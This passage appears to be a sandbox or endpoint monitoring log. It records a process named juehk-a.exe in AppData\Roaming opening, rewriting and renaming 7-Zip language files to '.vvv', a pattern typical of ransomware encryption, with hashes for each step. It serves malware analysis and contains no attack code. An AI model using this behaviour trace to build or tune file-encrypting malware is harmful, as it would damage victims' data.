10307.          sha1sum: 4b2759b5c588b1040e9938c08d23eee328311703
10308.          processinfo:
10309.            pid: 1648
10310.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10311.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10312.          old_name: C:\Program Files\7-Zip\Lang\br.txt
10313.          new_name: C:\Program Files\7-Zip\Lang\br.txt.vvv
10314.            ads:
10315.          fid (ads:): 562949953519724
10316.          ntstatus: 0x0
10317.          CreateOptions: 0x0
10318.        file:
10319.          timestamp: 60082
10320.          mode: open
10321.          sequenceNumber: 759
10322.          value: C:\Program Files\7-Zip\Lang\ca.txt
10323.          filesize: 13798
10324.          processinfo:
10325.            pid: 1648
10326.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10327.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10328.            ads:
10329.          fid (ads:): 562949953519725
10330.          ntstatus: 0x0
10331.          CreateOptions: 0x60
10332.        file:
10333.          timestamp: 60347
10334.          mode: close
10335.          sequenceNumber: 760
10336.          value: C:\Program Files\7-Zip\Lang\ca.txt
10337.          filesize: 14222
10338.          md5sum: d35d7f9279f165f4da80f1a714e49a74
10339.          sha1sum: b6027c21718517a09e99a43ae40d9bbf6160ce3e
10340.          processinfo:
10341.            pid: 1648
10342.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10343.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10344.            ads:
10345.          fid (ads:): 562949953519725
10346.          ntstatus: 0x0
10347.          CreateOptions: 0x0
10348.        file:
10349.          timestamp: 60395
10350.          mode: rename
10351.          sequenceNumber: 761
10352.          filesize: 14222
10353.          md5sum: d35d7f9279f165f4da80f1a714e49a74
10354.          sha1sum: b6027c21718517a09e99a43ae40d9bbf6160ce3e
10355.          processinfo:
10356.            pid: 1648
10357.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10358.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10359.          old_name: C:\Program Files\7-Zip\Lang\ca.txt
10360.          new_name: C:\Program Files\7-Zip\Lang\ca.txt.vvv
10361.            ads:
10362.          fid (ads:): 562949953519725
10363.          ntstatus: 0x0
10364.          CreateOptions: 0x0
10365.        file:
10366.          timestamp: 60407
10367.          mode: open
10368.          sequenceNumber: 762
10369.          value: C:\Program Files\7-Zip\Lang\cs.txt
10370.          filesize: 14109
10371.          processinfo:
10372.            pid: 1648
10373.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10374.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10375.            ads:
10376.          fid (ads:): 562949953519726
10377.          ntstatus: 0x0
10378.          CreateOptions: 0x60
10379.        file:
10380.          timestamp: 60514
10381.          mode: close
10382.          sequenceNumber: 763
10383.          value: C:\Program Files\7-Zip\Lang\cs.txt
10384.          filesize: 14526
10385.          md5sum: 2a0405cfff759b4e80a3dafcf5d355c4
10386.          sha1sum: 6d46fda5eb8dac52b70fa97c8e4db164751ed445
10387.          processinfo:
10388.            pid: 1648
10389.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10390.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10391.            ads:
10392.          fid (ads:): 562949953519726
10393.          ntstatus: 0x0
10394.          CreateOptions: 0x0
10395.        file:
10396.          timestamp: 60567
10397.          mode: rename
10398.          sequenceNumber: 764
10399.          filesize: 14526
10400.          md5sum: 2a0405cfff759b4e80a3dafcf5d355c4
10401.          sha1sum: 6d46fda5eb8dac52b70fa97c8e4db164751ed445
10402.          processinfo:
10403.            pid: 1648
10404.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10405.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10406.          old_name: C:\Program Files\7-Zip\Lang\cs.txt
10407.          new_name: C:\Program Files\7-Zip\Lang\cs.txt.vvv
10408.            ads:
10409.          fid (ads:): 562949953519726
10410.          ntstatus: 0x0
10411.          CreateOptions: 0x0
10412.        file:
10413.          timestamp: 60572
10414.          mode: open
10415.          sequenceNumber: 765
10416.          value: C:\Program Files\7-Zip\Lang\cy.txt
10417.          filesize: 10645
10418.          processinfo:
10419.            pid: 1648
10420.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10421.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10422.            ads:
10423.          fid (ads:): 562949953519727
10424.          ntstatus: 0x0
10425.          CreateOptions: 0x60
10426.        file:
10427.          timestamp: 60781
10428.          mode: close
10429.          sequenceNumber: 766
10430.          value: C:\Program Files\7-Zip\Lang\cy.txt
10431.          filesize: 11070
10432.          md5sum: b9c1dffac38bf486864b82dafe0aa96b
10433.          sha1sum: f2cce153979e6e037238081b7846567277bc0777
10434.          processinfo:
10435.            pid: 1648
10436.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10437.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10438.            ads:
10439.          fid (ads:): 562949953519727
10440.          ntstatus: 0x0
10441.          CreateOptions: 0x0
10442.        file:
10443.          timestamp: 60805
10444.          mode: rename
10445.          sequenceNumber: 767
10446.          filesize: 11070
10447.          md5sum: b9c1dffac38bf486864b82dafe0aa96b
10448.          sha1sum: f2cce153979e6e037238081b7846567277bc0777
10449.          processinfo:
10450.            pid: 1648
10451.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10452.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10453.          old_name: C:\Program Files\7-Zip\Lang\cy.txt
10454.          new_name: C:\Program Files\7-Zip\Lang\cy.txt.vvv
10455.            ads:
10456.          fid (ads:): 562949953519727
10457.          ntstatus: 0x0
10458.          CreateOptions: 0x0
10459.        file:
10460.          timestamp: 60842
10461.          mode: open
10462.          sequenceNumber: 768
10463.          value: C:\Program Files\7-Zip\Lang\da.txt
10464.          filesize: 12946
10465.          processinfo:
10466.            pid: 1648
10467.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10468.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10469.            ads:
10470.          fid (ads:): 562949953519728
10471.          ntstatus: 0x0
10472.          CreateOptions: 0x60
10473.        file:
10474.          timestamp: 60901
10475.          mode: close
10476.          sequenceNumber: 769
10477.          value: C:\Program Files\7-Zip\Lang\da.txt
10478.          filesize: 13374
10479.          md5sum: aee8c0dd237b4fdbe14510d440cb1069
10480.          sha1sum: b1fe7289246fe98be0f78e4663bd6688c6b4a7b5
10481.          processinfo:
10482.            pid: 1648
10483.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10484.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10485.            ads:
10486.          fid (ads:): 562949953519728
10487.          ntstatus: 0x0
10488.          CreateOptions: 0x0
10489.        file:
10490.          timestamp: 60916
10491.          mode: rename
10492.          sequenceNumber: 770
10493.          filesize: 13374
10494.          md5sum: aee8c0dd237b4fdbe14510d440cb1069
10495.          sha1sum: b1fe7289246fe98be0f78e4663bd6688c6b4a7b5
10496.          processinfo:
10497.            pid: 1648
10498.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10499.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10500.          old_name: C:\Program Files\7-Zip\Lang\da.txt
10501.          new_name: C:\Program Files\7-Zip\Lang\da.txt.vvv
10502.            ads:
10503.          fid (ads:): 562949953519728
10504.          ntstatus: 0x0
10505.          CreateOptions: 0x0
10506.        file:
10507.          timestamp: 60926
10508.          mode: open
10509.          sequenceNumber: 771
10510.          value: C:\Program Files\7-Zip\Lang\de.txt
10511.          filesize: 14513
10512.          processinfo:
10513.            pid: 1648
10514.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10515.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10516.            ads:
10517.          fid (ads:): 562949953519729
10518.          ntstatus: 0x0
10519.          CreateOptions: 0x60
10520.        file:
10521.          timestamp: 60981
10522.          mode: close
10523.          sequenceNumber: 772
10524.          value: C:\Program Files\7-Zip\Lang\de.txt
10525.          filesize: 14942
10526.          md5sum: 3d82a1ae1f0cd12b89f74baa99dd5b7b
10527.          sha1sum: e32b5a7d4ebc42cbf9f0ebbf510462348786629c
10528.          processinfo:
10529.            pid: 1648
10530.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10531.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10532.            ads:
10533.          fid (ads:): 562949953519729
10534.          ntstatus: 0x0
10535.          CreateOptions: 0x0
10536.        file:
10537.          timestamp: 60990
10538.          mode: rename
10539.          sequenceNumber: 773
10540.          filesize: 14942
10541.          md5sum: 3d82a1ae1f0cd12b89f74baa99dd5b7b
10542.          sha1sum: e32b5a7d4ebc42cbf9f0ebbf510462348786629c
10543.          processinfo:
10544.            pid: 1648
10545.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10546.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10547.          old_name: C:\Program Files\7-Zip\Lang\de.txt
10548.          new_name: C:\Program Files\7-Zip\Lang\de.txt.vvv
10549.            ads:
10550.          fid (ads:): 562949953519729
10551.          ntstatus: 0x0
10552.          CreateOptions: 0x0
10553.        file:
10554.          timestamp: 60996
10555.          mode: open
10556.          sequenceNumber: 774
10557.          value: C:\Program Files\7-Zip\Lang\el.txt
10558.          filesize: 21536
10559.          processinfo:
10560.            pid: 1648
10561.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10562.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10563.            ads:
10564.          fid (ads:): 562949953519730
10565.          ntstatus: 0x0
10566.          CreateOptions: 0x60
10567.        file:
10568.          timestamp: 61021
10569.          mode: close
10570.          sequenceNumber: 775
10571.          value: C:\Program Files\7-Zip\Lang\el.txt
10572.          filesize: 21966
10573.          md5sum: e9bdb0f8f3b4f66111984274d9572308
10574.          sha1sum: ccb1e767b9f0deb947b5239c6b836a51d709e99b
10575.          processinfo:
10576.            pid: 1648
10577.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10578.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10579.            ads:
10580.          fid (ads:): 562949953519730
10581.          ntstatus: 0x0
10582.          CreateOptions: 0x0
10583.        file:
10584.          timestamp: 61044
10585.          mode: rename
10586.          sequenceNumber: 776
10587.          filesize: 21966
10588.          md5sum: e9bdb0f8f3b4f66111984274d9572308
10589.          sha1sum: ccb1e767b9f0deb947b5239c6b836a51d709e99b
10590.          processinfo:
10591.            pid: 1648
10592.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10593.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10594.          old_name: C:\Program Files\7-Zip\Lang\el.txt
10595.          new_name: C:\Program Files\7-Zip\Lang\el.txt.vvv
10596.            ads:
10597.          fid (ads:): 562949953519730
10598.          ntstatus: 0x0
10599.          CreateOptions: 0x0
10600.        file:
10601.          timestamp: 61057
10602.          mode: open
10603.          sequenceNumber: 777
10604.          value: C:\Program Files\7-Zip\Lang\eo.txt
10605.          filesize: 10637
10606.          processinfo:
10607.            pid: 1648
10608.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10609.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10610.            ads:
10611.          fid (ads:): 562949953519731
10612.          ntstatus: 0x0
10613.          CreateOptions: 0x60
10614.        file:
10615.          timestamp: 61229
10616.          mode: close
10617.          sequenceNumber: 778
10618.          value: C:\Program Files\7-Zip\Lang\eo.txt
10619.          filesize: 11054
10620.          md5sum: 95c40073165910307049686b4819553d
10621.          sha1sum: 1a563445faab6ffa6557190efcd942f20ec8cd8f
10622.          processinfo:
10623.            pid: 1648
10624.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10625.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10626.            ads:
10627.          fid (ads:): 562949953519731
10628.          ntstatus: 0x0
10629.          CreateOptions: 0x0
10630.        file:
10631.          timestamp: 61315
10632.          mode: rename
10633.          sequenceNumber: 779
10634.          filesize: 11054
10635.          md5sum: 95c40073165910307049686b4819553d
10636.          sha1sum: 1a563445faab6ffa6557190efcd942f20ec8cd8f
10637.          processinfo:
10638.            pid: 1648
10639.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10640.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10641.          old_name: C:\Program Files\7-Zip\Lang\eo.txt
10642.          new_name: C:\Program Files\7-Zip\Lang\eo.txt.vvv
10643.            ads:
10644.          fid (ads:): 562949953519731
10645.          ntstatus: 0x0
10646.          CreateOptions: 0x0
10647.        file:
10648.          timestamp: 61367
10649.          mode: open
10650.          sequenceNumber: 780
10651.          value: C:\Program Files\7-Zip\Lang\es.txt
10652.          filesize: 14521
10653.          processinfo:
10654.            pid: 1648
10655.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10656.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10657.            ads:
10658.          fid (ads:): 562949953519732
10659.          ntstatus: 0x0
10660.          CreateOptions: 0x60
10661.        file:
10662.          timestamp: 61443
10663.          mode: close
10664.          sequenceNumber: 781
10665.          value: C:\Program Files\7-Zip\Lang\es.txt
10666.          filesize: 14942
10667.          md5sum: e2499d460fcaa10b7e3e485a59086981
10668.          sha1sum: fe82dd6b5bbc67fe223ae622ba63dea07450d680
10669.          processinfo:
10670.            pid: 1648
10671.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10672.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10673.            ads:
10674.          fid (ads:): 562949953519732
10675.          ntstatus: 0x0
10676.          CreateOptions: 0x0
10677.        file:
10678.          timestamp: 61453
10679.          mode: rename
10680.          sequenceNumber: 782
10681.          filesize: 14942
10682.          md5sum: e2499d460fcaa10b7e3e485a59086981
10683.          sha1sum: fe82dd6b5bbc67fe223ae622ba63dea07450d680
10684.          processinfo:
10685.            pid: 1648
10686.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10687.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10688.          old_name: C:\Program Files\7-Zip\Lang\es.txt
10689.          new_name: C:\Program Files\7-Zip\Lang\es.txt.vvv
10690.            ads:
10691.          fid (ads:): 562949953519732
10692.          ntstatus: 0x0
10693.          CreateOptions: 0x0
10694.        file:
10695.          timestamp: 61473
10696.          mode: open
10697.          sequenceNumber: 783
10698.          value: C:\Program Files\7-Zip\Lang\et.txt
10699.          filesize: 13481
10700.          processinfo:
10701.            pid: 1648
10702.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10703.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10704.            ads:
10705.          fid (ads:): 562949953519733
10706.          ntstatus: 0x0
10707.          CreateOptions: 0x60
10708.        file:
10709.          timestamp: 61645
10710.          mode: close
10711.          sequenceNumber: 784
10712.          value: C:\Program Files\7-Zip\Lang\et.txt
10713.          filesize: 13902
10714.          md5sum: 887bcb092f8ab69c6f1af6b4d659384d
10715.          sha1sum: 53e45487c2407fd190755eeb1b6b9206bf25419a
10716.          processinfo:
10717.            pid: 1648
10718.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10719.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10720.            ads:
10721.          fid (ads:): 562949953519733
10722.          ntstatus: 0x0
10723.          CreateOptions: 0x0
10724.        file:
10725.          timestamp: 61661
10726.          mode: rename
10727.          sequenceNumber: 785
10728.          filesize: 13902
10729.          md5sum: 887bcb092f8ab69c6f1af6b4d659384d
10730.          sha1sum: 53e45487c2407fd190755eeb1b6b9206bf25419a
10731.          processinfo:
10732.            pid: 1648
10733.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10734.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10735.          old_name: C:\Program Files\7-Zip\Lang\et.txt
10736.          new_name: C:\Program Files\7-Zip\Lang\et.txt.vvv
10737.            ads:
10738.          fid (ads:): 562949953519733
10739.          ntstatus: 0x0
10740.          CreateOptions: 0x0
10741.        file:
10742.          timestamp: 61713
10743.          mode: open
10744.          sequenceNumber: 786
10745.          value: C:\Program Files\7-Zip\Lang\eu.txt
10746.          filesize: 12799
10747.          processinfo:
10748.            pid: 1648
10749.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10750.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10751.            ads:
10752.          fid (ads:): 562949953519734
10753.          ntstatus: 0x0
10754.          CreateOptions: 0x60
10755.        file:
10756.          timestamp: 61801
10757.          mode: close
10758.          sequenceNumber: 787
10759.          value: C:\Program Files\7-Zip\Lang\eu.txt
10760.          filesize: 13214
10761.          md5sum: f79c6b750d043c42ba64c7213929790b
10762.          sha1sum: e5dd3082d88f5496eb93adc70224054838ba4d77
10763.          processinfo:
10764.            pid: 1648
10765.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10766.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10767.            ads:
10768.          fid (ads:): 562949953519734
10769.          ntstatus: 0x0
10770.          CreateOptions: 0x0
10771.        file:
10772.          timestamp: 61815
10773.          mode: rename
10774.          sequenceNumber: 788
10775.          filesize: 13214
10776.          md5sum: f79c6b750d043c42ba64c7213929790b
10777.          sha1sum: e5dd3082d88f5496eb93adc70224054838ba4d77
10778.          processinfo:
10779.            pid: 1648
10780.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10781.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10782.          old_name: C:\Program Files\7-Zip\Lang\eu.txt
10783.          new_name: C:\Program Files\7-Zip\Lang\eu.txt.vvv
10784.            ads:
10785.          fid (ads:): 562949953519734
10786.          ntstatus: 0x0
10787.          CreateOptions: 0x0
10788.        file:
10789.          timestamp: 61824
10790.          mode: open
10791.          sequenceNumber: 789
10792.          value: C:\Program Files\7-Zip\Lang\ext.txt
10793.          filesize: 14145
10794.          processinfo:
10795.            pid: 1648
10796.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10797.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10798.            ads:
10799.          fid (ads:): 562949953519735
10800.          ntstatus: 0x0
10801.          CreateOptions: 0x60
10802.        file:
10803.          timestamp: 61859
10804.          mode: close
10805.          sequenceNumber: 790
10806.          value: C:\Program Files\7-Zip\Lang\ext.txt
10807.          filesize: 14574
10808.          md5sum: 2c475554df7ab80ff50f5e2494787127
10809.          sha1sum: 53ebbd6bade882e4743ba5ee8f4e565c72726030
10810.          processinfo:
10811.            pid: 1648
10812.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10813.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10814.            ads:
10815.          fid (ads:): 562949953519735
10816.          ntstatus: 0x0
10817.          CreateOptions: 0x0
10818.        file:
10819.          timestamp: 61866
10820.          mode: rename
10821.          sequenceNumber: 791
10822.          filesize: 14574
10823.          md5sum: 2c475554df7ab80ff50f5e2494787127
10824.          sha1sum: 53ebbd6bade882e4743ba5ee8f4e565c72726030
10825.          processinfo:
10826.            pid: 1648
10827.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10828.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10829.          old_name: C:\Program Files\7-Zip\Lang\ext.txt
10830.          new_name: C:\Program Files\7-Zip\Lang\ext.txt.vvv
10831.            ads:
10832.          fid (ads:): 562949953519735
10833.          ntstatus: 0x0
10834.          CreateOptions: 0x0
10835.        file:
10836.          timestamp: 61871
10837.          mode: open
10838.          sequenceNumber: 792
10839.          value: C:\Program Files\7-Zip\Lang\fa.txt
10840.          filesize: 16655
10841.          processinfo:
10842.            pid: 1648
10843.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10844.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10845.            ads:
10846.          fid (ads:): 562949953519736
10847.          ntstatus: 0x0
10848.          CreateOptions: 0x60
10849.        file:
10850.          timestamp: 61942
10851.          mode: close
10852.          sequenceNumber: 793
10853.          value: C:\Program Files\7-Zip\Lang\fa.txt
10854.          filesize: 17070
10855.          md5sum: 9685a9850970e3c60af41f5a5cd9a3b1
10856.          sha1sum: 76a790a34200ab347b83f8b5ec90f879155c4579
10857.          processinfo:
10858.            pid: 1648
10859.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10860.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10861.            ads:
10862.          fid (ads:): 562949953519736
10863.          ntstatus: 0x0
10864.          CreateOptions: 0x0
10865.        file:
10866.          timestamp: 61949
10867.          mode: rename
10868.          sequenceNumber: 794
10869.          filesize: 17070
10870.          md5sum: 9685a9850970e3c60af41f5a5cd9a3b1
10871.          sha1sum: 76a790a34200ab347b83f8b5ec90f879155c4579
10872.          processinfo:
10873.            pid: 1648
10874.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10875.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10876.          old_name: C:\Program Files\7-Zip\Lang\fa.txt
10877.          new_name: C:\Program Files\7-Zip\Lang\fa.txt.vvv
10878.            ads:
10879.          fid (ads:): 562949953519736
10880.          ntstatus: 0x0
10881.          CreateOptions: 0x0
10882.        file:
10883.          timestamp: 61954
10884.          mode: open
10885.          sequenceNumber: 795
10886.          value: C:\Program Files\7-Zip\Lang\fi.txt
10887.          filesize: 14165
10888.          processinfo:
10889.            pid: 1648
10890.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10891.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10892.            ads:
10893.          fid (ads:): 562949953519737
10894.          ntstatus: 0x0
10895.          CreateOptions: 0x60
10896.        file:
10897.          timestamp: 62014
10898.          mode: close
10899.          sequenceNumber: 796
10900.          value: C:\Program Files\7-Zip\Lang\fi.txt
10901.          filesize: 14590
10902.          md5sum: d1c5c9bcccb1ea11314e0bf80d0704be
10903.          sha1sum: bc5dca404c5c561c965cd2fd9ab6946d7b81a8bc
10904.          processinfo:
10905.            pid: 1648
10906.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10907.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10908.            ads:
10909.          fid (ads:): 562949953519737
10910.          ntstatus: 0x0
10911.          CreateOptions: 0x0
10912.        file:
10913.          timestamp: 62023
10914.          mode: rename
10915.          sequenceNumber: 797
10916.          filesize: 14590
10917.          md5sum: d1c5c9bcccb1ea11314e0bf80d0704be
10918.          sha1sum: bc5dca404c5c561c965cd2fd9ab6946d7b81a8bc
10919.          processinfo:
10920.            pid: 1648
10921.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10922.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10923.          old_name: C:\Program Files\7-Zip\Lang\fi.txt
10924.          new_name: C:\Program Files\7-Zip\Lang\fi.txt.vvv
10925.            ads:
10926.          fid (ads:): 562949953519737
10927.          ntstatus: 0x0
10928.          CreateOptions: 0x0
10929.        file:
10930.          timestamp: 62028
10931.          mode: open
10932.          sequenceNumber: 798
10933.          value: C:\Program Files\7-Zip\Lang\fr.txt
10934.          filesize: 14652
10935.          processinfo:
10936.            pid: 1648
10937.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10938.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10939.            ads:
10940.          fid (ads:): 562949953519738
10941.          ntstatus: 0x0
10942.          CreateOptions: 0x60
10943.        file:
10944.          timestamp: 62067
10945.          mode: close
10946.          sequenceNumber: 799
10947.          value: C:\Program Files\7-Zip\Lang\fr.txt
10948.          filesize: 15070
10949.          md5sum: 06c6f9f10bc4c3f8ea0b0851db0a7696
10950.          sha1sum: 3b7cab7ac0708bdbb805a500a4dcaff31e04c618
10951.          processinfo:
10952.            pid: 1648
10953.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10954.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10955.            ads:
10956.          fid (ads:): 562949953519738
10957.          ntstatus: 0x0
10958.          CreateOptions: 0x0
10959.        file:
10960.          timestamp: 62133
10961.          mode: rename
10962.          sequenceNumber: 800
10963.          filesize: 15070
10964.          md5sum: 06c6f9f10bc4c3f8ea0b0851db0a7696
10965.          sha1sum: 3b7cab7ac0708bdbb805a500a4dcaff31e04c618
10966.          processinfo:
10967.            pid: 1648
10968.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10969.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10970.          old_name: C:\Program Files\7-Zip\Lang\fr.txt
10971.          new_name: C:\Program Files\7-Zip\Lang\fr.txt.vvv
10972.            ads:
10973.          fid (ads:): 562949953519738
10974.          ntstatus: 0x0
10975.          CreateOptions: 0x0
10976.        file:
10977.          timestamp: 62145
10978.          mode: open
10979.          sequenceNumber: 801
10980.          value: C:\Program Files\7-Zip\Lang\fur.txt
10981.          filesize: 13894
10982.          processinfo:
10983.            pid: 1648
10984.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
10985.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
10986.            ads:
10987.          fid (ads:): 562949953519739
10988.          ntstatus: 0x0
10989.          CreateOptions: 0x60
10990.        file:
10991.          timestamp: 62192
10992.          mode: close
10993.          sequenceNumber: 802
10994.          value: C:\Program Files\7-Zip\Lang\fur.txt
10995.          filesize: 14318
10996.          md5sum: 6af11e57a425e755fc08ea14027f419c
10997.          sha1sum: 9a09973970baaec539e599d68b794b950082eee0
10998.          processinfo:
10999.            pid: 1648
11000.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11001.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11002.            ads:
11003.          fid (ads:): 562949953519739
11004.          ntstatus: 0x0
11005.          CreateOptions: 0x0
11006.        file:
11007.          timestamp: 62205
11008.          mode: rename
11009.          sequenceNumber: 803
11010.          filesize: 14318
11011.          md5sum: 6af11e57a425e755fc08ea14027f419c
11012.          sha1sum: 9a09973970baaec539e599d68b794b950082eee0
11013.          processinfo:
11014.            pid: 1648
11015.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11016.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11017.          old_name: C:\Program Files\7-Zip\Lang\fur.txt
11018.          new_name: C:\Program Files\7-Zip\Lang\fur.txt.vvv
11019.            ads:
11020.          fid (ads:): 562949953519739
11021.          ntstatus: 0x0
11022.          CreateOptions: 0x0
11023.        file:
11024.          timestamp: 62223
11025.          mode: open
11026.          sequenceNumber: 804
11027.          value: C:\Program Files\7-Zip\Lang\fy.txt
11028.          filesize: 12468
11029.          processinfo:
11030.            pid: 1648
11031.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11032.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11033.            ads:
11034.          fid (ads:): 562949953519740
11035.          ntstatus: 0x0
11036.          CreateOptions: 0x60
11037.        file:
11038.          timestamp: 62335
11039.          mode: close
11040.          sequenceNumber: 805
11041.          value: C:\Program Files\7-Zip\Lang\fy.txt
11042.          filesize: 12894
11043.          md5sum: b3ffafdf8e6aa3bfc3d10dc41530cb49
11044.          sha1sum: 7b4ab97f5ea29bff01370a5ab2e0566318e118b8
11045.          processinfo:
11046.            pid: 1648
11047.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11048.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11049.            ads:
11050.          fid (ads:): 562949953519740
11051.          ntstatus: 0x0
11052.          CreateOptions: 0x0
11053.        file:
11054.          timestamp: 62392
11055.          mode: rename
11056.          sequenceNumber: 806
11057.          filesize: 12894
11058.          md5sum: b3ffafdf8e6aa3bfc3d10dc41530cb49
11059.          sha1sum: 7b4ab97f5ea29bff01370a5ab2e0566318e118b8
11060.          processinfo:
11061.            pid: 1648
11062.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11063.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11064.          old_name: C:\Program Files\7-Zip\Lang\fy.txt
11065.          new_name: C:\Program Files\7-Zip\Lang\fy.txt.vvv
11066.            ads:
11067.          fid (ads:): 562949953519740
11068.          ntstatus: 0x0
11069.          CreateOptions: 0x0
11070.        file:
11071.          timestamp: 62434
11072.          mode: open
11073.          sequenceNumber: 807
11074.          value: C:\Program Files\7-Zip\Lang\gl.txt
11075.          filesize: 10590
11076.          processinfo:
11077.            pid: 1648
11078.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11079.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11080.            ads:
11081.          fid (ads:): 562949953519741
11082.          ntstatus: 0x0
11083.          CreateOptions: 0x60
11084.        file:
11085.          timestamp: 62611
11086.          mode: close
11087.          sequenceNumber: 808
11088.          value: C:\Program Files\7-Zip\Lang\gl.txt
11089.          filesize: 11006
11090.          md5sum: 73be24c416880294b4d59099bf2435ff
11091.          sha1sum: d4bda2a8e9cfebf225447264327920c356dbd428
11092.          processinfo:
11093.            pid: 1648
11094.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11095.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11096.            ads:
11097.          fid (ads:): 562949953519741
11098.          ntstatus: 0x0
